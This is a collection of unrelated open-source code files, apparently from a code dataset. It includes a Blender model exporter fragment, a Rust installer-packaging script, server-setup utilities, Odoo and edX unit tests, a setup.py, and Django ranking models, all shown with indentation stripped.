for obj in objects:
if obj.users > 0 and obj.type == 'MESH' and obj.name[0:3] != 'WGT':
armature = obj.find_armature()
if armature is not None:
models[obj.name] = {}
bone_ids = {}
models[obj.name].update(anim_data(armature.data, bone_ids))
models[obj.name].update(mesh_data(obj, bone_ids))
else:
models[obj.name] = mesh_data(obj, None)
models[obj.name]["parallax"] = parallax_mapping
file = open(filepath, 'w', encoding='utf-8')
write_json(file, models)
file.close()
return {"FINISHED"}
from bpy.props import StringProperty, BoolProperty, EnumProperty
from bpy.types import Operator
from bpy_extras.io_utils import ExportHelper
class export_zmdl(Operator, ExportHelper):
"""Exporter for the zombye model format"""
bl_idname = "zmdl.export"
bl_label = "Export ZMDL"
filename_ext = ".zmdl"
filter_glob = StringProperty(
default="*.zmdl",
options={'HIDDEN'}
)
selected = BoolProperty(
name="selected",
description="Export only selected objects.",
default=False
)
parallax_mapping = BoolProperty(
name="parallax",
description="Enable parallax displacement mapping for this model.",
default=True
)
def execute(self, context):
return write_model(self.filepath, self.selected, self.parallax_mapping)
| mit |
tempbottle/rust-packaging | package-rust.py | 2 | 13929 | #!/usr/bin/env python2.7
# Copyright 2015 The Rust Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution and at
# http://rust-lang.org/COPYRIGHT.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
import sys, os, subprocess, shutil, datetime, glob
# Parse configuration
make_comb = True
make_exe = False
make_pkg = False
make_msi = False
msi_sval = False # skip msi validation
target = None
for arg in sys.argv:
if arg == "--no-combined":
make_comb = False
elif arg == "--exe":
make_exe = True
elif arg == "--pkg":
make_pkg = True
elif arg == "--msi":
make_msi = True
elif arg == "--msi-sval":
msi_sval = True
elif "--target" in arg:
target = arg.split("=")[1]
print
print "target: " + str(target)
print "combined: " + str(make_comb)
print "exe: " + str(make_exe)
print "pkg: " + str(make_pkg)
print "msi: " + str(make_msi)
print
if target is None:
print "specify --target"
sys.exit(1)
def run(args):
print ' '.join(args)
retval = subprocess.call(args)
if retval != 0:
print "call failed: " + str(args)
sys.exit(1)
# Move file with target overwrite
def move_file(source, target):
try: os.remove(target)
except OSError: pass
shutil.move(source, target)
INPUT_DIR = "./in"
OUTPUT_DIR = "./out"
TEMP_DIR = "./tmp"
RUSTC_PACKAGE_NAME = "rustc"
COMBINED_PACKAGE_NAME = "rust"
# Create the temp directory
if os.path.isdir(TEMP_DIR):
print "Removing old temp..."
shutil.rmtree(TEMP_DIR)
os.mkdir(TEMP_DIR)
if not os.path.isdir(OUTPUT_DIR):
os.mkdir(OUTPUT_DIR)
# The names of the packages that need to be combined via rust-installer
components = [RUSTC_PACKAGE_NAME, "cargo", "rust-docs"]
if "pc-windows-gnu" in target:
components.append("rust-mingw")
# Now find the names of the tarballs that belong to those components
inputs = []
package_version = None
rustc_installer = None
cargo_installer = None
docs_installer = None
mingw_installer = None
for component in components:
component_installer = None
for filename in os.listdir(INPUT_DIR):
if target in filename and component in filename:
# Hack: several components contain 'rust' in the name
if not (component == "rust" and ("rust-docs" in filename or "rust-mingw" in filename)):
component_installer = filename
if not component_installer:
print "unable to find installer for component " + component + ", target " + target
sys.exit(1)
inputs.append(INPUT_DIR + "/" + component_installer)
# Extract the version from the filename
if component == RUSTC_PACKAGE_NAME:
s = component_installer[len(RUSTC_PACKAGE_NAME) + 1:]
p = s.find(target)
package_version = s[:p - 1]
rustc_installer = component_installer
if component == "cargo":
cargo_installer = component_installer
if component == "rust-docs":
docs_installer = component_installer
if component == "rust-mingw":
mingw_installer = component_installer
assert package_version is not None
assert rustc_installer is not None
# Set up the overlay of license info
run(["tar", "xzf", INPUT_DIR + "/" + rustc_installer, "-C", TEMP_DIR, ])
rustc_dir = TEMP_DIR + "/" + rustc_installer[:len(rustc_installer) - len(".tar.gz")]
overlay_dir = TEMP_DIR + "/overlay"
os.mkdir(overlay_dir)
shutil.copyfile(rustc_dir + "/COPYRIGHT", overlay_dir + "/COPYRIGHT")
shutil.copyfile(rustc_dir + "/LICENSE-APACHE", overlay_dir + "/LICENSE-APACHE")
shutil.copyfile(rustc_dir + "/LICENSE-MIT", overlay_dir + "/LICENSE-MIT")
shutil.copyfile(rustc_dir + "/version", overlay_dir + "/version")
# Use a custom README that explains how to install
shutil.copyfile("./etc/README.md", overlay_dir + "/README.md")
if make_comb:
# Combine the installers
tarball_list=",".join(inputs)
package_name=COMBINED_PACKAGE_NAME + "-" + package_version + "-" + target
run(["sh", "./rust-installer/combine-installers.sh",
"--product-name=Rust",
"--rel-manifest-dir=rustlib",
"--success-message=Rust-is-ready-to-roll.",
"--work-dir=" + TEMP_DIR + "/work",
"--output-dir=" + OUTPUT_DIR,
"--package-name=" + package_name,
"--legacy-manifest-dirs=rustlib,cargo",
"--input-tarballs=" + tarball_list,
"--non-installed-overlay=" + overlay_dir
])
# Everything below here is used for producing non-rust-installer packaging
# Create the LICENSE.txt file used in some GUI installers
license_file = TEMP_DIR + "/LICENSE.txt"
cmd = "cat {0}/COPYRIGHT {0}/LICENSE-APACHE {0}/LICENSE-MIT > {1}".format(rustc_dir, license_file)
run(["sh", "-c", cmd])
if make_msi:
license_rtf = TEMP_DIR + "/LICENSE.rtf"
# Convert plain text to RTF
with open(license_file, "rt") as input:
with open(license_rtf, "wt") as output:
output.write(r"{\rtf1\ansi\deff0{\fonttbl{\f0\fnil\fcharset0 Arial;}}\nowwrap\fs18"+"\n")
for line in input.readlines():
output.write(line)
output.write(r"\line ")
output.write("}")
# Reconstruct the following variables from the Rust makefile from the version number.
# Currently these are needed by the Windows installer.
CFG_RELEASE_NUM = None
CFG_PRERELEASE_VERSION = None
CFG_RELEASE = None
CFG_PACKAGE_NAME = None
CFG_BUILD = None
CFG_PACKAGE_VERS = None
# Pull the version number out of the version file
# Examples:
# 1.0.0-alpha.2 (522d09dfe 2015-02-19) (built 2015-02-19)
# 1.0.0-nightly (b0746ff19 2015-03-05) (built 2015-03-06)
CFG_RELEASE_INFO = None
full_version = None
for line in open(os.path.join(rustc_dir, "version")):
print "reported version: " + line
full_version = line.split(" ")[0]
CFG_RELEASE_INFO = line.strip()
assert full_version is not None
version_number = full_version.split("-")[0]
prerelease_version = ""
if "beta." in full_version or "alpha." in full_version:
prerelease_version = "." + full_version.split(".")[-1]
# Guess the channel from the version
channel = None
if "nightly" in full_version:
channel = "nightly"
elif "beta" in full_version or "alpha" in full_version:
channel = "beta"
elif "dev" in full_version:
channel = "dev"
else:
channel = "stable"
CFG_RELEASE_NUM=version_number
CFG_RELEASE=full_version
CFG_PRERELEASE_VERSION=prerelease_version
CFG_VER_MAJOR, CFG_VER_MINOR, CFG_VER_PATCH = version_number.split('.')
CFG_VER_BUILD = str((datetime.date.today() - datetime.date(2000,1,1)).days) # days since Y2K
# Logic reproduced from main.mk
if channel == "stable":
CFG_PACKAGE_VERS=CFG_RELEASE_NUM
elif channel == "beta":
CFG_PACKAGE_VERS="beta"
elif channel == "nightly":
CFG_PACKAGE_VERS="nightly"
elif channel == "dev":
CFG_PACKAGE_VERS=CFG_RELEASE_NUM + "-dev"
else:
print "unknown release channel"
sys.exit(1)
# This should be the same as the name on the tarballs
CFG_PACKAGE_NAME=COMBINED_PACKAGE_NAME + "-" + CFG_PACKAGE_VERS
CFG_BUILD=target
CFG_CHANNEL=channel
if "pc-windows-gnu" in target:
CFG_MINGW="1"
else:
CFG_MINGW="0"
if "x86_64" in target:
CFG_PLATFORM = "x64"
elif "i686":
CFG_PLATFORM = "x86"
# Export all vars starting with CFG_
cfgs = [pair for pair in locals().items() if pair[0].startswith("CFG_")]
cfgs.sort()
for k,v in cfgs:
print k,"=",v
os.environ[k] = v
if make_pkg:
print "creating .pkg"
assert docs_installer is not None
assert cargo_installer is not None
rustc_package_name = rustc_installer.replace(".tar.gz", "")
docs_package_name = docs_installer.replace(".tar.gz", "")
cargo_package_name = cargo_installer.replace(".tar.gz", "")
os.mkdir(TEMP_DIR + "/pkg")
shutil.copytree(TEMP_DIR + "/work/" + rustc_package_name, TEMP_DIR + "/pkg/rustc")
shutil.copytree(TEMP_DIR + "/work/" + cargo_package_name, TEMP_DIR + "/pkg/cargo")
shutil.copytree(TEMP_DIR + "/work/" + docs_package_name, TEMP_DIR + "/pkg/rust-docs")
# The package root, extracted from a tarball has entirely wrong permissions.
# This goes over everything and fixes them.
run(["chmod", "-R", "u+rwX,go+rX,go-w", TEMP_DIR + "/pkg"])
for filename in os.listdir(TEMP_DIR + "/pkg/rustc/rustc/bin"):
run(["chmod", "0755", TEMP_DIR + "/pkg/rustc/rustc/bin/" + filename])
for filename in os.listdir(TEMP_DIR + "/pkg/cargo/cargo/bin"):
run(["chmod", "0755", TEMP_DIR + "/pkg/cargo/cargo/bin/" + filename])
# Copy the postinstall script that will execute install.sh
shutil.copyfile("./pkg/postinstall", TEMP_DIR + "/pkg/rustc/postinstall")
run(["chmod", "a+x", TEMP_DIR + "/pkg/rustc/postinstall"])
shutil.copyfile("./pkg/postinstall", TEMP_DIR + "/pkg/cargo/postinstall")
run(["chmod", "a+x", TEMP_DIR + "/pkg/cargo/postinstall"])
shutil.copyfile("./pkg/postinstall", TEMP_DIR + "/pkg/rust-docs/postinstall")
run(["chmod", "a+x", TEMP_DIR + "/pkg/rust-docs/postinstall"])
pkgbuild_cmd = "pkgbuild --identifier org.rust-lang.rustc " + \
"--scripts " + TEMP_DIR + "/pkg/rustc --nopayload " + TEMP_DIR + "/pkg/rustc.pkg"
run(["sh", "-c", pkgbuild_cmd])
pkgbuild_cmd = "pkgbuild --identifier org.rust-lang.cargo " + \
"--scripts " + TEMP_DIR + "/pkg/cargo --nopayload " + TEMP_DIR + "/pkg/cargo.pkg"
run(["sh", "-c", pkgbuild_cmd])
pkgbuild_cmd = "pkgbuild --identifier org.rust-lang.rust-docs " + \
"--scripts " + TEMP_DIR + "/pkg/rust-docs --nopayload " + TEMP_DIR + "/pkg/rust-docs.pkg"
run(["sh", "-c", pkgbuild_cmd])
# Also create an 'uninstall' package
os.mkdir(TEMP_DIR + "/pkg/uninstall")
shutil.copyfile("./pkg/postinstall", TEMP_DIR + "/pkg/uninstall/postinstall")
run(["chmod", "a+x", TEMP_DIR + "/pkg/uninstall/postinstall"])
pkgbuild_cmd = "pkgbuild --identifier org.rust-lang.uninstall " + \
"--scripts " + TEMP_DIR + "/pkg/uninstall --nopayload " + TEMP_DIR + "/pkg/uninstall.pkg"
run(["sh", "-c", pkgbuild_cmd])
os.mkdir(TEMP_DIR + "/pkg/res")
shutil.copyfile(TEMP_DIR + "/LICENSE.txt", TEMP_DIR + "/pkg/res/LICENSE.txt")
shutil.copyfile("./gfx/rust-logo.png", TEMP_DIR + "/pkg/res/rust-logo.png")
productbuild_cmd = "productbuild --distribution ./pkg/Distribution.xml " + \
"--resources " + TEMP_DIR + "/pkg/res " + OUTPUT_DIR + "/" + package_name + ".pkg " + \
"--package-path " + TEMP_DIR + "/pkg"
run(["sh", "-c", productbuild_cmd])
if make_exe or make_msi:
if make_exe:
print "creating .exe"
if make_msi:
print "creating .msi"
assert docs_installer is not None
assert cargo_installer is not None
exe_temp_dir = TEMP_DIR + "/exe"
os.mkdir(exe_temp_dir)
run(["tar", "xzf", INPUT_DIR + "/" + rustc_installer, "-C", exe_temp_dir])
run(["tar", "xzf", INPUT_DIR + "/" + docs_installer, "-C", exe_temp_dir])
run(["tar", "xzf", INPUT_DIR + "/" + cargo_installer, "-C", exe_temp_dir])
orig_rustc_dir = exe_temp_dir + "/" + rustc_installer.replace(".tar.gz", "") + "/rustc"
orig_docs_dir = exe_temp_dir + "/" + docs_installer.replace(".tar.gz", "") + "/rust-docs"
orig_cargo_dir = exe_temp_dir + "/" + cargo_installer.replace(".tar.gz", "") + "/cargo"
# Move these to locations needed by the iscc script and wix sources
rustc_dir = exe_temp_dir + "/rustc"
docs_dir = exe_temp_dir + "/rust-docs"
cargo_dir = exe_temp_dir + "/cargo"
os.rename(orig_rustc_dir, rustc_dir)
os.rename(orig_docs_dir, docs_dir)
os.rename(orig_cargo_dir, cargo_dir)
if mingw_installer is not None:
run(["tar", "xzf", INPUT_DIR + "/" + mingw_installer, "-C", exe_temp_dir])
orig_mingw_dir = exe_temp_dir + "/" + mingw_installer.replace(".tar.gz", "") + "/rust-mingw"
mingw_dir = exe_temp_dir + "/rust-mingw"
os.rename(orig_mingw_dir, mingw_dir)
else:
assert "pc-windows-gnu" not in target
# Remove the installer files we don't need
dir_comp_pairs = [(rustc_dir, "rustc"), (docs_dir, "rust-docs"),
(cargo_dir, "cargo")]
if mingw_installer is not None:
dir_comp_pairs += [(mingw_dir, "rust-mingw")]
for dir_and_component in dir_comp_pairs:
dir_ = dir_and_component[0]
component = dir_and_component[1]
os.remove(dir_ + "/manifest.in")
if make_exe:
# Copy installer files, etc.
shutil.copyfile("./exe/rust.iss", exe_temp_dir + "/rust.iss")
shutil.copyfile("./exe/modpath.iss", exe_temp_dir + "/modpath.iss")
shutil.copyfile("./exe/upgrade.iss", exe_temp_dir + "/upgrade.iss")
shutil.copyfile("./gfx/rust-logo.ico", exe_temp_dir + "/rust-logo.ico")
shutil.copyfile(TEMP_DIR + "/LICENSE.txt", exe_temp_dir + "/LICENSE.txt")
cwd=os.getcwd()
os.chdir(exe_temp_dir)
args = ["iscc", "rust.iss"]
if "windows-gnu" in target:
args += ["/dMINGW"]
run(args)
os.chdir(cwd)
exefile = CFG_PACKAGE_NAME + "-" + CFG_BUILD + ".exe"
move_file(exe_temp_dir + "/" + exefile, OUTPUT_DIR + "/" + exefile)
if make_msi:
# Copy installer files, etc.
for f in glob.glob("./msi/*"):
shutil.copy(f, exe_temp_dir)
for f in glob.glob("./gfx/*"):
shutil.copy(f, exe_temp_dir)
shutil.copy(TEMP_DIR + "/LICENSE.rtf", exe_temp_dir)
cwd=os.getcwd()
os.chdir(exe_temp_dir)
run(["make", "SVAL=%i" % msi_sval])
os.chdir(cwd)
msifile = CFG_PACKAGE_NAME + "-" + CFG_BUILD + ".msi"
move_file(exe_temp_dir + "/" + msifile, OUTPUT_DIR + "/" + msifile)
| apache-2.0 |
jfmorcillo/mss | mss/agent/lib/utils.py | 3 | 2996 | # -*- coding: UTF-8 -*-
#
# (c) 2010-2012 Mandriva, http://www.mandriva.com/
#
# This file is part of Mandriva Server Setup
#
# MSS is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# MSS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with MSS; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
import traceback
import sys
import ConfigParser
import re
import os
import netifaces
from IPy import IP
def formatExceptionInfo(maxTBlevel=5):
cla, exc, trbk = sys.exc_info()
excName = cla.__name__
try:
excArgs = exc.__dict__["args"]
except KeyError:
excArgs = "<no args>"
excTb = traceback.format_tb(trbk, maxTBlevel)
return str(excName+" "+excArgs+" : \n"+excTb[0])
def getINIoption(section, option, ini):
config = ConfigParser.SafeConfigParser()
config.read(ini)
return config.get(section, option)
def get_config_option(file, option):
"""
Returns the option value of a config file formatted like:
OPTION=value
"""
if os.path.exists(file):
with open(file) as f:
string = f.read()
expr = re.compile("\s*%s\s*=\s*(.*)" % option, re.M)
match = expr.search(string)
if match and match.group(1):
return match.group(1).strip()
else:
return ""
else:
raise OSError("File not found")
def grep(search, file):
if os.path.exists(file):
with open(file) as f:
string = f.read()
expr = re.compile(search, re.M)
if expr.search(string):
return True
else:
return False
else:
return False
def ethernet_ifs():
ifs = []
for interface in netifaces.interfaces():
if interface.startswith("eth"):
if_detail = netifaces.ifaddresses(interface)
# check if interface is configured
if netifaces.AF_INET in if_detail:
addr = if_detail[netifaces.AF_INET][0]['addr']
netmask = if_detail[netifaces.AF_INET][0]['netmask']
network = IP(addr).make_net(netmask).strNormal(0)
ifs.append([interface, addr, network, netmask])
return ifs
class Singleton(type):
def __init__(cls, name, bases, dict):
super(Singleton, cls).__init__(name, bases, dict)
cls.instance = None
def __call__(cls, *args, **kw):
if cls.instance is None:
cls.instance = super(Singleton, cls).__call__(*args, **kw)
return cls.instance
| gpl-3.0 |
dkodnik/arp | addons/web/tests/test_menu.py | 34 | 5729 | # -*- coding: utf-8 -*-
import collections
import mock
import unittest2
from openerp.http import request as req
from . import common
from ..controllers import main
class Placeholder(object):
def __init__(self, **kwargs):
for k, v in kwargs.iteritems():
setattr(self, k, v)
class LoadTest(common.MockRequestCase):
def setUp(self):
super(LoadTest, self).setUp()
self.menu = main.Menu()
# Have self.request.session.model() return a different mock object for
# each model (but always the same mock for a given model name)
models = collections.defaultdict(mock.Mock)
model = req.session.model.side_effect = \
lambda model_name: models[model_name]
self.MockMenus = model('ir.ui.menu')
# Mock the absence of custom menu
model('res.users').read.return_value = []
def tearDown(self):
del self.MockMenus
del self.menu
super(LoadTest, self).tearDown()
def test_empty(self):
self.MockMenus.search.return_value = []
self.MockMenus.read.return_value = []
root = self.menu.load()
self.MockMenus.search.assert_called_with(
[('parent_id','=', False)], 0, False, False,
req.context)
self.assertEqual(root['all_menu_ids'], [])
self.assertListEqual(
root['children'],
[])
def test_applications_sort(self):
self.MockMenus.search.return_value = [1, 2, 3]
self.MockMenus.read.side_effect = lambda *args: [
{'id': 1, 'sequence': 1, 'parent_id': False},
{'id': 3, 'sequence': 2, 'parent_id': False},
{'id': 2, 'sequence': 3, 'parent_id': False},
]
root = self.menu.load()
self.MockMenus.search.assert_called_with(
[('id','child_of', [1, 2, 3])], 0, False, False,
req.context)
self.MockMenus.read.assert_called_with(
[1, 2, 3], ['name', 'sequence', 'parent_id',
'action'],
req.context)
self.assertEqual(root['all_menu_ids'], [1, 2, 3])
self.assertEqual(
root['children'],
[{
'id': 1, 'sequence': 1,
'parent_id': False, 'children': []
}, {
'id': 3, 'sequence': 2,
'parent_id': False, 'children': []
}, {
'id': 2, 'sequence': 3,
'parent_id': False, 'children': []
}])
def test_deep(self):
self.MockMenus.search.side_effect = lambda domain, *args: (
[1] if domain == [('parent_id', '=', False)] else [1, 2, 3, 4])
root = {'id': 1, 'sequence': 1, 'parent_id': False}
self.MockMenus.read.side_effect = lambda ids, *args: (
[root] if ids == [1] else [
{'id': 1, 'sequence': 1, 'parent_id': False},
{'id': 2, 'sequence': 2, 'parent_id': [1, '']},
{'id': 3, 'sequence': 1, 'parent_id': [2, '']},
{'id': 4, 'sequence': 2, 'parent_id': [2, '']},
])
root = self.menu.load()
self.MockMenus.search.assert_called_with(
[('id','child_of', [1])], 0, False, False,
req.context)
self.assertEqual(root['all_menu_ids'], [1, 2, 3, 4])
self.assertEqual(
root['children'],
[{
'id': 1,
'sequence': 1,
'parent_id': False,
'children': [{
'id': 2,
'sequence': 2,
'parent_id': [1, ''],
'children': [{
'id': 3,
'sequence': 1,
'parent_id': [2, ''],
'children': []
}, {
'id': 4,
'sequence': 2,
'parent_id': [2, ''],
'children': []
}]
}]
}]
)
class ActionMungerTest(unittest2.TestCase):
def setUp(self):
self.menu = main.Menu()
def test_actual_treeview(self):
action = {
"views": [[False, "tree"], [False, "form"],
[False, "calendar"]],
"view_type": "tree",
"view_id": False,
"view_mode": "tree,form,calendar"
}
changed = action.copy()
del action['view_type']
main.fix_view_modes(changed)
self.assertEqual(changed, action)
def test_list_view(self):
action = {
"views": [[False, "tree"], [False, "form"],
[False, "calendar"]],
"view_type": "form",
"view_id": False,
"view_mode": "tree,form,calendar"
}
main.fix_view_modes(action)
self.assertEqual(action, {
"views": [[False, "list"], [False, "form"],
[False, "calendar"]],
"view_id": False,
"view_mode": "list,form,calendar"
})
def test_redundant_views(self):
action = {
"views": [[False, "tree"], [False, "form"],
[False, "calendar"], [42, "tree"]],
"view_type": "form",
"view_id": False,
"view_mode": "tree,form,calendar"
}
main.fix_view_modes(action)
self.assertEqual(action, {
"views": [[False, "list"], [False, "form"],
[False, "calendar"], [42, "list"]],
"view_id": False,
"view_mode": "list,form,calendar"
})
| agpl-3.0 |
edxnercel/edx-platform | cms/djangoapps/contentstore/views/tests/test_library.py | 114 | 9392 | """
Unit tests for contentstore.views.library
More important high-level tests are in contentstore/tests/test_libraries.py
"""
from contentstore.tests.utils import AjaxEnabledTestClient, parse_json
from contentstore.utils import reverse_course_url, reverse_library_url
from contentstore.views.component import get_component_templates
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import LibraryFactory
from mock import patch
from opaque_keys.edx.locator import CourseKey, LibraryLocator
import ddt
from student.roles import LibraryUserRole
LIBRARY_REST_URL = '/library/' # URL for GET/POST requests involving libraries
def make_url_for_lib(key):
""" Get the RESTful/studio URL for testing the given library """
if isinstance(key, LibraryLocator):
key = unicode(key)
return LIBRARY_REST_URL + key
@ddt.ddt
class UnitTestLibraries(ModuleStoreTestCase):
"""
Unit tests for library views
"""
def setUp(self):
user_password = super(UnitTestLibraries, self).setUp()
self.client = AjaxEnabledTestClient()
self.client.login(username=self.user.username, password=user_password)
######################################################
# Tests for /library/ - list and create libraries:
@patch("contentstore.views.library.LIBRARIES_ENABLED", False)
def test_with_libraries_disabled(self):
"""
The library URLs should return 404 if libraries are disabled.
"""
response = self.client.get_json(LIBRARY_REST_URL)
self.assertEqual(response.status_code, 404)
def test_list_libraries(self):
"""
Test that we can GET /library/ to list all libraries visible to the current user.
"""
# Create some more libraries
libraries = [LibraryFactory.create() for _ in range(3)]
lib_dict = dict([(lib.location.library_key, lib) for lib in libraries])
response = self.client.get_json(LIBRARY_REST_URL)
self.assertEqual(response.status_code, 200)
lib_list = parse_json(response)
self.assertEqual(len(lib_list), len(libraries))
for entry in lib_list:
self.assertIn("library_key", entry)
self.assertIn("display_name", entry)
key = CourseKey.from_string(entry["library_key"])
self.assertIn(key, lib_dict)
self.assertEqual(entry["display_name"], lib_dict[key].display_name)
del lib_dict[key] # To ensure no duplicates are matched
@ddt.data("delete", "put")
def test_bad_http_verb(self, verb):
"""
We should get an error if we do weird requests to /library/
"""
response = getattr(self.client, verb)(LIBRARY_REST_URL)
self.assertEqual(response.status_code, 405)
def test_create_library(self):
""" Create a library. """
response = self.client.ajax_post(LIBRARY_REST_URL, {
'org': 'org',
'library': 'lib',
'display_name': "New Library",
})
self.assertEqual(response.status_code, 200)
# That's all we check. More detailed tests are in contentstore.tests.test_libraries...
@patch.dict('django.conf.settings.FEATURES', {'ENABLE_CREATOR_GROUP': True})
def test_lib_create_permission(self):
"""
Users who are not given course creator roles should still be able to
create libraries.
"""
self.client.logout()
ns_user, password = self.create_non_staff_user()
self.client.login(username=ns_user.username, password=password)
response = self.client.ajax_post(LIBRARY_REST_URL, {
'org': 'org', 'library': 'lib', 'display_name': "New Library",
})
self.assertEqual(response.status_code, 200)
@ddt.data(
{},
{'org': 'org'},
{'library': 'lib'},
{'org': 'C++', 'library': 'lib', 'display_name': 'Lib with invalid characters in key'},
{'org': 'Org', 'library': 'Wh@t?', 'display_name': 'Lib with invalid characters in key'},
)
def test_create_library_invalid(self, data):
"""
Make sure we are prevented from creating libraries with invalid keys/data
"""
response = self.client.ajax_post(LIBRARY_REST_URL, data)
self.assertEqual(response.status_code, 400)
def test_no_duplicate_libraries(self):
"""
We should not be able to create multiple libraries with the same key
"""
lib = LibraryFactory.create()
lib_key = lib.location.library_key
response = self.client.ajax_post(LIBRARY_REST_URL, {
'org': lib_key.org,
'library': lib_key.library,
'display_name': "A Duplicate key, same as 'lib'",
})
self.assertIn('already a library defined', parse_json(response)['ErrMsg'])
self.assertEqual(response.status_code, 400)
######################################################
# Tests for /library/:lib_key/ - get a specific library as JSON or HTML editing view
def test_get_lib_info(self):
"""
Test that we can get data about a library (in JSON format) using /library/:key/
"""
# Create a library
lib_key = LibraryFactory.create().location.library_key
# Re-load the library from the modulestore, explicitly including version information:
lib = self.store.get_library(lib_key, remove_version=False, remove_branch=False)
version = lib.location.library_key.version_guid
self.assertNotEqual(version, None)
response = self.client.get_json(make_url_for_lib(lib_key))
self.assertEqual(response.status_code, 200)
info = parse_json(response)
self.assertEqual(info['display_name'], lib.display_name)
self.assertEqual(info['library_id'], unicode(lib_key))
self.assertEqual(info['previous_version'], None)
self.assertNotEqual(info['version'], None)
self.assertNotEqual(info['version'], '')
self.assertEqual(info['version'], unicode(version))
def test_get_lib_edit_html(self):
"""
Test that we can get the studio view for editing a library using /library/:key/
"""
lib = LibraryFactory.create()
response = self.client.get(make_url_for_lib(lib.location.library_key))
self.assertEqual(response.status_code, 200)
self.assertIn("<html", response.content)
self.assertIn(lib.display_name, response.content)
@ddt.data('library-v1:Nonexistent+library', 'course-v1:Org+Course', 'course-v1:Org+Course+Run', 'invalid')
def test_invalid_keys(self, key_str):
"""
Check that various Nonexistent/invalid keys give 404 errors
"""
response = self.client.get_json(make_url_for_lib(key_str))
self.assertEqual(response.status_code, 404)
def test_bad_http_verb_with_lib_key(self):
"""
We should get an error if we do weird requests to /library/
"""
lib = LibraryFactory.create()
for verb in ("post", "delete", "put"):
response = getattr(self.client, verb)(make_url_for_lib(lib.location.library_key))
self.assertEqual(response.status_code, 405)
def test_no_access(self):
user, password = self.create_non_staff_user()
self.client.login(username=user, password=password)
lib = LibraryFactory.create()
response = self.client.get(make_url_for_lib(lib.location.library_key))
self.assertEqual(response.status_code, 403)
def test_get_component_templates(self):
"""
Verify that templates for adding discussion and advanced components to
content libraries are not provided.
"""
lib = LibraryFactory.create()
lib.advanced_modules = ['lti']
lib.save()
templates = [template['type'] for template in get_component_templates(lib, library=True)]
self.assertIn('problem', templates)
self.assertNotIn('discussion', templates)
self.assertNotIn('advanced', templates)
def test_manage_library_users(self):
"""
Simple test that the Library "User Access" view works.
Also tests that we can use the REST API to assign a user to a library.
"""
library = LibraryFactory.create()
extra_user, _ = self.create_non_staff_user()
manage_users_url = reverse_library_url('manage_library_users', unicode(library.location.library_key))
response = self.client.get(manage_users_url)
self.assertEqual(response.status_code, 200)
# extra_user has not been assigned to the library so should not show up in the list:
self.assertNotIn(extra_user.username, response.content)
# Now add extra_user to the library:
user_details_url = reverse_course_url(
'course_team_handler',
library.location.library_key, kwargs={'email': extra_user.email}
)
edit_response = self.client.ajax_post(user_details_url, {"role": LibraryUserRole.ROLE})
self.assertIn(edit_response.status_code, (200, 204))
# Now extra_user should apear in the list:
response = self.client.get(manage_users_url)
self.assertEqual(response.status_code, 200)
self.assertIn(extra_user.username, response.content)
| agpl-3.0 |
Som-Energia/intercoop | python/setup.py | 1 | 1213 | #!/usr/bin/env python
from setuptools import setup, find_packages
readme = open("README.rst").read()
setup(
name = "intercoop",
version = "0.2.1",
description =
"Intercooperation library",
author = "Som Energia SCCL",
author_email = "info@somenergia.coop",
url = 'https://github.com/Som-Energia/intercoop',
long_description = readme,
license = 'GNU Affero General Public License v3 or later (AGPLv3+)',
packages=find_packages(exclude=['*[tT]est*']),
scripts=[
'api-example-somacme.py',
'portal-example-somillusio.py',
'validate-intercoop.py',
],
install_requires=[
'pycrypto',
'yamlns>=0.6',
'requests',
'requests-mock',
'flask',
'jsonschema<3',
'erppeek',
# 'qrcode',
# 'lxml',
# 'qrtools',
# 'zbar',
],
include_package_data = True,
test_suite = 'intercoop',
classifiers = [
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules',
'Intended Audience :: Developers',
'Development Status :: 4 - Beta',
'License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)',
'Operating System :: OS Independent',
],
)
| agpl-3.0 |
jeremyjbowers/cfbreference_com | rankings/models.py | 1 | 2698 | from django.db import models
from college.models import College, Player, Week, CollegeYear
RANKINGTYPE_CHOICES = (
('T', 'Team'),
('P', 'Player'),
)
CURRENT_SEASON = 2011
class RankingType(models.Model):
name = models.CharField(max_length=75)
slug = models.SlugField(max_length=75)
typename = models.CharField(max_length=1, choices=RANKINGTYPE_CHOICES)
ncaa_name = models.CharField(max_length=75)
def __unicode__(self):
return self.name
def get_current_url(self):
return "/rankings/%s/%s/" % (self.slug, CURRENT_SEASON)
def get_partial_url(self):
return "/rankings/%s/" % self.slug
def year_list(self):
return list(set([y.year for y in self.ranking_set.all()]))
class Ranking(models.Model):
ranking_type = models.ForeignKey(RankingType)
collegeyear = models.ForeignKey(CollegeYear)
season = models.IntegerField()
week = models.ForeignKey(Week)
rank = models.PositiveIntegerField()
is_tied = models.BooleanField()
actual = models.FloatField()
conference_rank = models.PositiveIntegerField(null=True)
is_conf_tied = models.BooleanField()
division = models.CharField(max_length=1)
def __unicode__(self):
return "%s - %s (%s)" % (self.ranking_type, self.collegeyear, self.week)
def get_week_url(self):
return "/rankings/%s/%s/week/%s/" % (self.ranking_type.slug, self.year, self.week.week_num)
class RushingSummary(models.Model):
player = models.ForeignKey(Player)
season = models.IntegerField()
week = models.ForeignKey(Week)
rank = models.PositiveIntegerField()
is_tied = models.BooleanField()
carries = models.PositiveIntegerField()
net = models.PositiveIntegerField()
td = models.PositiveIntegerField()
average = models.FloatField()
yards_per_game = models.FloatField()
def __unicode__(self):
return "%s - %s, %s" (self.player, self.year, self.yards_per_game)
class PassEfficiency(models.Model):
player = models.ForeignKey(Player)
season = models.IntegerField()
week = models.ForeignKey(Week)
rank = models.PositiveIntegerField()
attempts = models.PositiveIntegerField()
completions = models.PositiveIntegerField()
completion_pct = models.FloatField()
